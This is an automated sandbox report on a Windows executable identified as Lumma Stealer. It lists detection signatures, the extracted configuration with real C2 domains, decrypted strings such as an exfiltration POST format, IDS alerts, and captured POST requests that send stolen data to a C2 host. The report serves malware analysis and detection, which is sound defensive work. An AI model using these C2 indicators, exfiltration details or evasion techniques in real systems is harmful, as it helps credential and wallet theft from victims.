Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1fxm3u0d.exe

Overview

General Information

Sample name:1fxm3u0d.exe
Analysis ID:1577311
MD5:2ca092d4c58d496d25e1238185d31b6e
SHA1:e06646a559cd47d169926ed515644d4ca78feec2
SHA256:cd84eee729821ff54b7a766713b7b582005c91e34f7ca9f77e7dc121e14f6493
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 1fxm3u0d.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\1fxm3u0d.exe" MD5: 2CA092D4C58D496D25E1238185D31B6E)
    • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 1fxm3u0d.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\1fxm3u0d.exe" MD5: 2CA092D4C58D496D25E1238185D31B6E)
    • WerFault.exe (PID: 3948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["goalyfeastz.site", "thighpecr.cyou", "servicedny.site", "authorisev.site", "faulteyotk.site", "dilemmadu.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "FATE99--Unique"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: 1fxm3u0d.exe PID: 6596JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: 1fxm3u0d.exe PID: 6596JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:02.147349+010020283713Unknown Traffic192.168.2.54970523.55.153.106443TCP
                2024-12-18T11:33:04.632141+010020283713Unknown Traffic192.168.2.549708104.21.66.86443TCP
                2024-12-18T11:33:10.402197+010020283713Unknown Traffic192.168.2.549712104.21.66.86443TCP
                2024-12-18T11:33:12.986476+010020283713Unknown Traffic192.168.2.549713104.21.66.86443TCP
                2024-12-18T11:33:16.870175+010020283713Unknown Traffic192.168.2.549718104.21.66.86443TCP
                2024-12-18T11:33:19.509209+010020283713Unknown Traffic192.168.2.549724104.21.66.86443TCP
                2024-12-18T11:33:21.982900+010020283713Unknown Traffic192.168.2.549731104.21.66.86443TCP
                2024-12-18T11:33:24.402351+010020283713Unknown Traffic192.168.2.549738104.21.66.86443TCP
                2024-12-18T11:33:30.409861+010020283713Unknown Traffic192.168.2.549758104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:08.830259+010020546531A Network Trojan was detected192.168.2.549708104.21.66.86443TCP
                2024-12-18T11:33:11.438395+010020546531A Network Trojan was detected192.168.2.549712104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:08.830259+010020498361A Network Trojan was detected192.168.2.549708104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:11.438395+010020498121A Network Trojan was detected192.168.2.549712104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:00.036959+010020570711Domain Observed Used for C2 Detected192.168.2.5495461.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:59.349775+010020570771Domain Observed Used for C2 Detected192.168.2.5595481.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:59.578043+010020570791Domain Observed Used for C2 Detected192.168.2.5642271.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:59.810077+010020570831Domain Observed Used for C2 Detected192.168.2.5653731.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:59.131332+010020570851Domain Observed Used for C2 Detected192.168.2.5515381.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:58.902357+010020570891Domain Observed Used for C2 Detected192.168.2.5541621.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:58.679311+010020570931Domain Observed Used for C2 Detected192.168.2.5558111.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:00.354666+010020570951Domain Observed Used for C2 Detected192.168.2.5551201.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:32:58.450789+010020570971Domain Observed Used for C2 Detected192.168.2.5566951.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:18.117298+010020480941Malware Command and Control Activity Detected192.168.2.549718104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:24.406261+010028438641A Network Trojan was detected192.168.2.549738104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T11:33:02.959840+010028586661Domain Observed Used for C2 Detected192.168.2.54970523.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://authorisev.site/apiAvira URL Cloud: Label: phishing
                Source: https://faulteyotk.site/api(Avira URL Cloud: Label: malware
                Source: https://servicedny.site/apiPAvira URL Cloud: Label: malware
                Source: 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "thighpecr.cyou", "servicedny.site", "authorisev.site", "faulteyotk.site", "dilemmadu.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "FATE99--Unique"}
                Source: 1fxm3u0d.exeVirustotal: Detection: 57%Perma Link
                Source: 1fxm3u0d.exeReversingLabs: Detection: 68%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: 1fxm3u0d.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: servicedny.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: authorisev.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: faulteyotk.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dilemmadu.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: contemteny.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: goalyfeastz.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: opposezmny.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: seallysl.site
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: thighpecr.cyou
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: FATE99--Unique
                Source: 1fxm3u0d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49738 version: TLS 1.2
                Source: 1fxm3u0d.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001A5898 FindFirstFileExW,0_2_001A5898
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001A5949 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_001A5949

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2057093 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site) : 192.168.2.5:55811 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057085 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site) : 192.168.2.5:51538 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057083 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (faulteyotk .site) : 192.168.2.5:65373 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057077 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (contemteny .site) : 192.168.2.5:59548 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.5:49546 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057079 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dilemmadu .site) : 192.168.2.5:64227 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057089 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site) : 192.168.2.5:54162 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057095 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site) : 192.168.2.5:55120 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057097 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thighpecr .cyou) : 192.168.2.5:56695 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49705 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49718 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49738 -> 104.21.66.86:443
                Source: Malware configuration extractorURLs: goalyfeastz.site
                Source: Malware configuration extractorURLs: thighpecr.cyou
                Source: Malware configuration extractorURLs: servicedny.site
                Source: Malware configuration extractorURLs: authorisev.site
                Source: Malware configuration extractorURLs: faulteyotk.site
                Source: Malware configuration extractorURLs: dilemmadu.site
                Source: Malware configuration extractorURLs: contemteny.site
                Source: Malware configuration extractorURLs: opposezmny.site
                Source: Malware configuration extractorURLs: seallysl.site
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49758 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49738 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12914Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GQQ2DS1FJFJFFVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15132Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ESPXYNHJ3ZZNBVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20616Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1333Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SSHF8DNVNZFFVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569058Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: thighpecr.cyou
                Source: global trafficDNS traffic detected: DNS query: seallysl.site
                Source: global trafficDNS traffic detected: DNS query: opposezmny.site
                Source: global trafficDNS traffic detected: DNS query: goalyfeastz.site
                Source: global trafficDNS traffic detected: DNS query: contemteny.site
                Source: global trafficDNS traffic detected: DNS query: dilemmadu.site
                Source: global trafficDNS traffic detected: DNS query: faulteyotk.site
                Source: global trafficDNS traffic detected: DNS query: authorisev.site
                Source: global trafficDNS traffic detected: DNS query: servicedny.site
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authorisev.site/api
                Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
